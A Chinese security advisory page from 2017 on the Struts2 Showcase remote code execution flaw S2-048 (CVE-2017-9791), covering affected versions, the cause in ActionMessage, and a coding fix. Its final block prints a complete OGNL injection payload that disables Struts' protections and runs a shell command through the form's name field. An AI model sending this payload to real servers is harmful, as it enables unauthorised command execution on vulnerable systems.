当前位置:首页 > Safe 2017年07月08日
斗象科技发现高危Struts2 showcase远程代码执行漏洞(S2-048)

近期,来自斗象科技(Tophant)的安全研究员icez发现Struts2 showcase应用中存在远程代码执行高危漏洞。Struts2官方已经确认该漏洞(漏洞编号S2-048,CVE编号:CVE-2017-9791),漏洞危害程度为高危(High)。

漏洞编号

CVE-2017-9791

S2-048

s2-048.png

漏洞影响

Struts 2.3.x系列中的Showcase应用

值得一提的是,showcase指的是一个应用,通常在路径 \struts-2.3.x\apps\struts2-showcase.war 中存在,如果服务器上并未安装该应用则不受到漏洞影响。

漏洞概述

Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架。在Struts 2.3.x 系列的 Showcase 应用中演示Struts2整合Struts 1 的插件中存在一处任意代码执行漏洞。当你的应用使用了Struts2 Struts1的插件时,可能导致不受信任的输入传入到ActionMessage类中导致命令执行。

解决方案

向ActionMessage传递原始消息时使用类似下面的资源键值,不要直接传递原始数值


messages.add("msg", new ActionMessage("struts1.gangsterAdded", gform.getName()));


值不应如此:


messages.add("msg", new ActionMessage("Gangster " + gform.getName() + " was added"));


name=${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=newjava.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}&age=456&__checkbox_bustedBefore=true&deion=789


发表评论: